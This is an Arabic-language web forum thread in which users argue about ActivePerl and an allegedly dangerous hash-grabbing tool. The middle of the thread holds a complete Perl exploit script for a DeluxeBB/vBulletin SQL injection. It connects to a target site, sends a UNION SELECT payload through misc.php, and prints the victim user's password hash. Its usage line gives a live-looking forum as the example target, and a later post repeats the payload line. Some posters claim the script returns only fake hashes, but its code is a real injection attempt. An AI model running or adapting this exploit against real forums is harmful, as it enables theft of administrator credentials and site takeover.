![]() |
الخطر تسرب < ActivePerl
من غير مقدمات : في هذا الموضوع ينتهي كل شئ على الانترنت - وانتظروا التجربـ بالتصوير راح أطربقها ونبي من عنده خبره واسعه في البرمجه في التصدي باخذ الهاش !!! ما ابي اوضح اكثر من كذا خوفا من المخربين فقط المهم تابع الخطر تسرب < ActivePerl الخبره أجنبيه والعبه عربية نبي الكل يهتم بالموضوع والنقاش حولهـ |
:D .... الله يهديك سويت فيها فلم وخبرة أجنبية ولعبة أمريكية مدري عربية
ActivePerl هذا برنامج مترجم " دعم " البيرل على الويندوز يستخدم في ترجمة برامج البيرل و تشغيلها على الويندوز , طبعاً كنظام مثل الويندوز فـ ما نحتاجه لكن الهكر يستخدمونه لترجمة أدوات الاختراق و الاكسبلويتات المكتوبة بلغة البيرل بالنسبة لـ الأداة المكتوبة بلغة البيرل اللي طاحت بيدك هذي أداة قديمة من قبل 3 سنوات تنفذ امر وتحط رابط المنتدى او اي سكريبت ويعطيك الـHash أو الباس المشفر بتشفير md5 ولكنه لا يعطيك هذا فعلاً , مجرد هاش مزور لا أعلم طريقة تكوينه لأني ما فكيت الملف وقريته فما فيه خطر .. وما يحتاج الضجة اللي انت مسويها شكراً لك تشآآآو |
إقتباس:
بس قلنا الخبره أجنبيه والعبه عربية خلنا من الثغره : الموجوده او غيرها من ما طرح بمثل اللى عندي #!/usr/bin/perl use IO::Socket; print q{ ################################################## #### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # ################################################## #### }; if (!$ARGV[2]) { print q{ Usage: perl dbbxpl.pl host /directory/ victim_userid هنا يتغير اسم امنتدى المصاب وكسر الادمن فقط perl dbbxpl.pl www.theorangebelt.org/forums /1 }; } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] SERVER: $server\r\n"; print "[>] DIR: $dir\r\n"; print "[>] USERID: $user\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغره20deluxebb_users%20WHERE%20(uid='".$user ; print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "Password Hash is: ".$1."\r\n"; print "--------------------------------------------------------------------------------------\r\n"; } exit(); } } print "------------------------------------------------------------------------------------------------\r\n"; كوده نبدله : بثغره او خطئ باي شئ مصاب به الموقع مو السكربت ورفعه بالكود او امر يختص به في التنفيذ ابيك تفسرها لي : اذا كان عندك فكره عامه بالبرمجة الموجود ثغره التعليمات بالوردي ؟؟؟ البرنامج عندي من غير تثبيت !! تشغيل الامر باسم Installer بيس والبرامج الحديثه شرايك بها بنفس البرنامج |
هذا الملف اللي نزلته عبارة عن ثغرة Sql Injection بغض النظر عن كونها تنفذ عبر البيرل
ولا يدوي , ما يفــرق ! والثغرة هذي في نسخة قديمة ..... ما فهمت وش تقصد بآخر كلامك :) |
vbulletin Remote SQL Injection Exploit
الحرب على الانترنيت بدات :evil::evil: $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0, pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغره20deluxebb_users%20WHERE%20(uid='".$user ; :D:D |
رد
هذه خدعه اخي سبق ونزلت شرح خدعة هذه الثغره فاهي تقوم بعمل HASH وهمي تخدع المخترق انه تمكن من الحصول علي باسورد الموقع وطبعا script kiddz مش فاهم وفرحان انه حصل علي باسورد الموقع :]
|
جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 12:18 AM. |
Powered by vBulletin
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Copyright © ArabWebTalk.Com 2004-2012